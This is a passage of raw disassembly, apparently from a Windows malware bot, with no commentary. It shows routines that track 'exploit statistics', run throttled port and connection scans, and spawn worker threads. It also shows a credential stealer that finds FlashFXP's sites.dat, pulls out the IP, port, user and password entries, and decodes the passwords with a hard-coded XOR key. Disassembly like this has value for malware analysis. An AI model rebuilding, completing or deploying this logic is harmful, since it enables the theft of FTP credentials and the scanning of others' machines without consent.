push dword_41CD6A[eax]
push offset dword_41D014
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and dword_41CD6A[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D0C0
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D088
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D058
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D0F0
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D160
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D14C
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D110
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D1A8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D378
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset asc_41D370 ; "\r\n\r\n["
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset aIp ; "\r\nIP="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset aPort ; "\r\nPort="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset aUser_0 ; "\r\nUser="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset aPass_0 ; "\r\nPass="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset asc_41D344 ; "[%[^]]]\r\n"
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
